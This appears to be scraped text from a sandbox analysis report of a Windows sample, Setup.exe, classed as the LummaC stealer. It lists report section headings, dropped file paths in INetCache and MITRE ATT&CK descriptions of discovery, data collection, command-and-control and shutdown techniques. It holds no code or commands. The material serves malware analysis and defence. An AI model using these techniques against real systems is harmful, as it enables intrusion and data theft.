Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\o

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Addiction

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Advertise

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cd

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dramatically

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Enlarge

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Expiration

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Few

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Greensboro

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Human

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Intensity

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Invite

Windows Analysis Report
Setup.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre